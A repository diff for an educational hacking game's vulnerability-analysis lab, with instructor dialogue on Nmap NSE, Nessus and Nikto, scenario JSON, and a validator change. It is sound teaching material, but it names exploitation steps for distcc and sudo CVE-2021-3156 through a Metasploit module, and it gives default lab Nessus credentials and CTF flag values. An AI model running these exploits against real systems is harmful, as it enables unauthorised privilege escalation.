#influence_increased
+ [Which approach is better?]
The best security assessments use both!
Start with vulnerability scanning to quickly identify low-hanging fruit and obvious issues.
Then use penetration testing to go deeper, verify critical findings, and test how vulnerabilities can be chained together.
Many organizations do frequent vulnerability scans with periodic penetration tests.
Think of scanning as your smoke detector, and penetration testing as your fire drill.
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== nmap_nse ===
The Nmap Scripting Engine (NSE) extends Nmap's capabilities beyond simple port scanning.
~ instructor_rapport += 5
#influence_increased
NSE allows Nmap to be extended with scripts that add service detection, vulnerability checking, and even exploitation capabilities.
Nmap is distributed with hundreds of scripts written in the Lua programming language.
+ [How do I use Nmap scripts?]
The simplest way is to use the default script set:
nmap -sC TARGET
This runs all scripts categorized as "default" - safe, useful, and not overly intrusive.
For vulnerability scanning specifically: nmap --script vuln -sV TARGET
The vuln category includes scripts that check for known vulnerabilities.
You can also run specific scripts: nmap --script distcc-cve2004-2687 TARGET
~ instructor_rapport += 5
#influence_increased
+ [Where are NSE scripts located?]
All NSE scripts are stored in /usr/share/nmap/scripts/
You can list them with: ls /usr/share/nmap/scripts/
Each script is a .nse file. Looking at their code shows what they check for.
For example, distcc-cve2004-2687.nse checks for the specific Distcc vulnerability.
The scripts are organized by category: auth, broadcast, default, discovery, dos, exploit, fuzzer, intrusive, malware, safe, version, and vuln.
~ instructor_rapport += 5
#influence_increased
+ [How effective is NSE for vulnerability detection?]
NSE vulnerability detection is useful but limited.
The vuln scripts check for specific, well-known vulnerabilities - they're not comprehensive like dedicated vulnerability scanners.
However, they're very useful for quick checks and are actively maintained by the Nmap community.
Think of NSE as a lightweight vulnerability scanner - good for initial assessment but not a replacement for tools like Nessus.
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== nessus_scanner ===
Nessus by Tenable is one of the most popular commercial vulnerability scanners in the industry.
~ instructor_rapport += 5
#influence_increased
It uses a client-server architecture with a web interface, and can scan for tens of thousands of vulnerabilities.
Vulnerability tests are written in NASL (Nessus Attack Scripting Language), and subscribers receive regular updates to vulnerability signatures.
+ [How do I use Nessus?]
Access Nessus through its web interface at https://localhost:8834
Login with the credentials provided (typically nessusadmin)
Click "New Scan" and choose a scan template - Basic Network Scan is a good starting point.
Enter your target IP addresses and click "Launch"
Nessus will systematically test the targets and present results categorized by severity: Critical, High, Medium, Low, Info.
~ instructor_rapport += 5
#influence_increased
+ [What scan templates does Nessus offer?]
Nessus offers various scan profiles for different purposes:
Basic Network Scan - Good general-purpose scan for network services
Advanced Scan - Allows detailed customization of what to check
Web Application Tests - Focused on web vulnerabilities
Compliance scans - Check systems against security policy standards
Each template determines which vulnerability checks run and how aggressive the scanning is.
~ instructor_rapport += 5
#influence_increased
+ [How do I interpret Nessus results?]
Nessus presents results with detailed information for each finding:
Severity rating (Critical to Info) helps prioritize remediation
CVE identifiers link to official vulnerability databases
Plugin descriptions explain what was found and why it's a problem
Solution sections provide remediation guidance
References link to additional information and exploit code
You can export results as HTML, PDF, or XML for reports or import into Metasploit.
~ instructor_rapport += 5
#influence_increased
+ [What's the difference between Basic and Advanced scans?]
Basic scans use default settings optimized for speed and safety.
Advanced scans let you customize:
Which vulnerability checks to run
Whether to perform "thorough tests" (slower but more comprehensive)
Whether to show potential false alarms
Advanced scans typically find more vulnerabilities but take longer and carry slightly higher risk of disruption.
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== nikto_scanner ===
Nikto is a command-line web vulnerability scanner focused exclusively on web servers and applications.
~ instructor_rapport += 5
#influence_increased
While general scanners like Nmap and Nessus check web servers, Nikto specializes in web-specific vulnerabilities.
It scans for over 6,000 web security issues including dangerous CGI scripts, misconfigurations, and known vulnerable software.
+ [How do I use Nikto?]
Nikto is straightforward to use:
nikto -host TARGET_IP
Nikto will automatically detect web servers on common ports and scan them.
You can also specify a port: nikto -host TARGET_IP -port 8080
Or scan SSL/TLS sites: nikto -host TARGET_IP -ssl
The output shows each issue found with references to more information.
~ instructor_rapport += 5
#influence_increased
+ [What kinds of issues does Nikto detect?]
Nikto looks for web-specific vulnerabilities:
Outdated server software with known exploits
Dangerous default files and directories (admin panels, config files)
Server misconfigurations (directory listings, verbose errors)
Known vulnerable web applications and frameworks
Interesting HTTP headers that might reveal information
~ instructor_rapport += 5
#influence_increased
+ [How does Nikto compare to Nessus for web scanning?]
Nikto and Nessus overlap but have different strengths:
Nikto is specialized - it goes deeper on web-specific issues.
Nessus is broader - it checks web servers along with everything else.
Nikto is free and open source; Nessus commercial versions are quite expensive.
For comprehensive web testing, use both! They often find different issues.
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== tool_limitations ===
Understanding the limitations of automated tools is crucial for effective security assessment.
~ instructor_rapport += 5
#influence_increased
No single tool finds everything. Different tools detect different vulnerabilities based on their databases and testing methods.
All automated tools produce false positives and false negatives.
+ [What are false positives and false negatives?]
False positives are vulnerabilities reported that don't actually exist.
For example, a scanner might think software is vulnerable based on version number, but a patch was backported.
False negatives are real vulnerabilities that scanners miss completely.
This happens when vulnerabilities aren't in the scanner's database, or tests aren't configured to detect them.
Penetration testing helps confirm scanner findings and find what was missed.
~ instructor_rapport += 5
#influence_increased
+ [Why don't scanners detect all vulnerabilities?]
Several factors limit scanner effectiveness:
Signature-based detection only finds KNOWN vulnerabilities in their databases.
Zero-day vulnerabilities (unknown to vendors) won't be detected.
Configuration issues and logical flaws often can't be detected automatically.
Scanners might not test certain services if they're on non-standard ports.
Safe mode settings might skip tests that could confirm vulnerabilities.
~ instructor_rapport += 5
#influence_increased
+ [How can different scanners miss different things?]
Each scanner has different vulnerability databases and detection methods:
Nmap NSE has a limited set of vulnerability scripts focused on network services.
Nessus has an extensive database of checks but might not detect web-specific issues.
Nikto specializes in web vulnerabilities but doesn't check other services.
This is why security professionals run multiple scanners - each catches things others miss.
Even then, manual testing is essential to find what all the scanners missed!
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== commands_reference ===
Let me provide a comprehensive vulnerability scanning commands reference.
~ instructor_rapport += 5
#influence_increased
**Nmap NSE Scanning:**
Default script scan: nmap -sC TARGET
Vulnerability scripts: nmap --script vuln -sV TARGET
Specific ports: nmap --script vuln -sV -p 1-5000 TARGET
Specific script: nmap --script distcc-cve2004-2687 TARGET
List available scripts: ls /usr/share/nmap/scripts/
View script code: cat /usr/share/nmap/scripts/SCRIPT_NAME.nse
+ [Show me Nessus workflow]
**Nessus Scanning:**
Access web interface: https://localhost:8834
Login: nessusadmin / nessusadmin01
**Workflow:**
1. Click "New Scan"
2. Select scan template (Basic Network Scan or Advanced Scan)
3. Enter scan name and target IP addresses
4. For Advanced scans, configure: Thorough tests, Show potential false alarms
5. Click "Save" then "Launch"
6. View results: Click scan name → "Vulnerabilities" tab
7. Export results: "Export" → choose format (HTML, PDF, CSV, XML)
~ instructor_rapport += 3
#influence_increased
+ [Show me Nikto commands]
**Nikto Web Scanning:**
Basic scan: nikto -host TARGET_IP
Specific port: nikto -host TARGET_IP -port 8080
SSL/HTTPS: nikto -host TARGET_IP -ssl
Multiple ports: nikto -host TARGET_IP -port 80,443,8080
**Tips:**
Output can be verbose - redirect to file: nikto -host TARGET > nikto_results.txt
Check specific paths: nikto -host TARGET -root /admin/
~ instructor_rapport += 3
#influence_increased
+ [Show me comparison workflow]
**Comprehensive Assessment Workflow:**
1. Start with Nmap service detection: nmap -sV -p- TARGET
2. Run Nmap vuln scripts: nmap --script vuln -sV TARGET
3. Launch Nessus Basic scan for broad coverage
4. Launch Nessus Advanced scan with thorough tests
5. For web servers, run Nikto: nikto -host TARGET
6. Compare results - note what each tool found uniquely
7. Verify critical findings with manual testing or exploitation
~ instructor_rapport += 3
#influence_increased
- -> vuln_scan_hub
=== challenge_tips ===
Let me give you practical tips for the vulnerability assessment challenges.
~ instructor_rapport += 5
#influence_increased
**Running Scans:**
Start Nmap vuln scans early - they take time to complete.
While Nmap runs, start your Nessus scans in parallel.
If Nessus is still initializing plugins, skip ahead to Nikto and come back.
+ [Tips for comparing results?]
Document what each tool finds:
Note which vulnerabilities Nmap NSE detects
Count vulnerabilities by severity in Nessus (Critical, High, Medium, Low)
Compare Basic vs Advanced Nessus scans - how many more does Advanced find?
Check what Nikto finds that the others missed
The lab has MULTIPLE exploitable vulnerabilities - see how many each tool detects.
~ instructor_rapport += 5
#influence_increased
+ [Tips for exploiting found vulnerabilities?]
The lab includes vulnerabilities you've seen before (like Distcc) and new ones.
Try exploiting vulnerabilities detected by the scanners to confirm they're real.
There's a NEW privilege escalation vulnerability this week - a different sudo vulnerability.
This time you don't know the user's password, so the previous sudo exploit won't work!
Look for CVE-2021-3156 (Baron Samedit) - affects sudo versions 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1
~ instructor_rapport += 5
#influence_increased
+ [Tips for privilege escalation?]
After exploiting a service, check the sudo version: sudo --version
The Baron Samedit vulnerability (CVE-2021-3156) might be present.
This exploit works differently - it doesn't require knowing a password!
You may need to upgrade your shell to Meterpreter first to use the Metasploit exploit.
Search Metasploit: search baron_samedit or search CVE-2021-3156
Use: exploit/linux/local/sudo_baron_samedit
~ instructor_rapport += 5
#influence_increased
+ [Troubleshooting tips?]
If Nessus gives API access errors, clear your browser cache (Ctrl+Shift+Delete)
If you can't access a web server, check Firefox proxy settings - disable the proxy or add exclusion for 10.*.*.*
Some vulnerable services might be patched - try attacking all available services.
Nessus scans can take 15-30 minutes - be patient!
Compare results across all tools to see their different strengths and blind spots.
~ instructor_rapport += 5
#influence_increased
- -> vuln_scan_hub
=== ready_for_practice ===
Excellent! You're ready for comprehensive vulnerability assessment.
~ instructor_rapport += 10
#influence_increased
~ vuln_scanning_mastery += 10
#influence_increased
You'll use multiple industry-standard tools to assess the same target and compare their effectiveness.
This lab demonstrates an important lesson: no single tool catches everything. Layer your defenses and your assessments!
Remember: vulnerability scanners are reconnaissance tools. Use them only on authorized targets.
+ [Any final advice?]
Be systematic. Run all the tools, document findings, and compare results.
Pay attention to what each tool finds that others miss - this teaches you their strengths and weaknesses.
Don't just collect scan results - verify critical findings by actually exploiting them.
The limitations of these tools are as important as their capabilities. Real attackers won't stop at what scanners find.
Take notes on severity ratings, CVE numbers, and remediation advice - these make great report content.
Good luck, Agent {player_name}. Time to see what automated tools can and can't detect!
~ instructor_rapport += 10
#influence_increased
- -> vuln_scan_hub
-> vuln_scan_hub

1
scenarios/lab_vulnerability_analysis/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

25
scenarios/lab_vulnerability_analysis/mission.json Normal file
View File

@@ -0,0 +1,25 @@
{
"display_name": "Vulnerability Analysis",
"description": "Learn to use industry-standard vulnerability scanning tools including Nmap NSE, Nessus, and Nikto. Your vulnerability assessment specialist instructor will guide you through automated vulnerability detection and assessment before you practice in a hands-on VM lab environment.",
"difficulty_level": 1,
"secgen_scenario": "labs/introducing_attacks/8_vulnerability_analysis.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": [
"VULNERABILITY ANALYSIS / VULNERABILITY SCANNING",
"AUDIT APPROACH",
"PENETRATION TESTING - SOFTWARE TOOLS",
"PENETRATION TESTING - ACTIVE PENETRATION"
]
},
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["EXPLOITATION"]
}
]
}

165
scenarios/lab_vulnerability_analysis/scenario.json.erb Normal file
View File

@@ -0,0 +1,165 @@
{
"scenario_brief": "Welcome to the Vulnerability Analysis Lab! Your vulnerability assessment specialist instructor will guide you through Nmap NSE, Nessus, and Nikto. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the vulnerability assessment specialist instructor, launch the VMs, and capture all available flags from the Linux server to demonstrate your understanding of vulnerability assessment techniques.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"vuln_scanning_mastery": 0
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture all flags from the Linux server",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit all required flags from Linux server",
"type": "submit_flags",
"targetFlags": ["linux_server-flag1", "linux_server-flag2"],
"targetCount": 2,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "vulnerability_assessment_specialist",
"displayName": "Vulnerability Assessment Specialist",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_vulnerability_analysis/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{
"eventPattern": "objective_aim_completed:complete_vm_lab",
"targetKnot": "flags_completed_congrats",
"conversationMode": "person-chat",
"autoTrigger": true,
"cooldown": 0
}
],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/8-vulnerability-analysis/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Vulnerability Analysis Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice vulnerability assessment techniques\n4. Capture all flags from the Linux server\n\nThe vulnerability assessment specialist instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Nmap, Nessus, and Nikto\n - Linux Server Terminal: Target for vulnerability assessment\n\n2. Your objectives:\n - Use Nmap NSE to scan for vulnerabilities\n - Use Nessus to perform comprehensive vulnerability scans\n - Use Nikto to scan for web vulnerabilities\n - Compare results from different tools\n - Exploit found vulnerabilities and capture flags\n - Escalate privileges using CVE-2021-3156 (Baron Samedit)\n\n3. Submit flags at the Flag Submission Terminal in the VM Lab Room\n\nFlags to capture from linux_server:\n- flag1 - After exploiting initial vulnerability (e.g., Distcc)\n- flag2 - After privilege escalation (Baron Samedit)\n\nRemember what the instructor taught you about vulnerability assessment tools!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Nmap, Nessus, and Nikto",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('vulnerability_analysis', {
"id": 1,
"title": "kali",
"ip": "172.16.0.3",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_linux_server",
"name": "Linux Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Linux server for vulnerability assessment practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('vulnerability_analysis', {
"id": 2,
"title": "linux_server",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the Linux server here",
"acceptsVms": ["linux_server"],
"flags": <%= flags_for_vm('linux_server', [
'flag{vulnerability_analysis_initial_exploit}',
'flag{vulnerability_analysis_privilege_escalation}'
]) %>,
"flagRewards": [
{
"type": "emit_event",
"event_name": "vulnerability_analysis_flag_submitted",
"description": "Vulnerability analysis flag submitted - demonstrates vulnerability assessment skills"
}
]
}
]
}
}
}

17
scripts/validate_scenario.rb
View File

@@ -306,6 +306,23 @@ def check_common_issues(json_data)
end
end
# Validate timedConversation structure
if npc['timedConversation']
tc = npc['timedConversation']
# Check for incorrect property name
if tc['knot'] && !tc['targetKnot']
issues << "❌ INVALID: '#{path}' timedConversation uses 'knot' property - should use 'targetKnot' instead. Change 'knot' to 'targetKnot'"
end
# Check for missing targetKnot
unless tc['targetKnot']
issues << "❌ INVALID: '#{path}' timedConversation missing required 'targetKnot' property - must specify the Ink knot to navigate to"
end
# Check for missing delay
unless tc.key?('delay')
issues << "⚠ WARNING: '#{path}' timedConversation missing 'delay' property - should specify delay in milliseconds (0 for immediate)"
end
end
# Track phone NPCs (phone contacts)
if npc['npcType'] == 'phone'
has_phone_contacts = true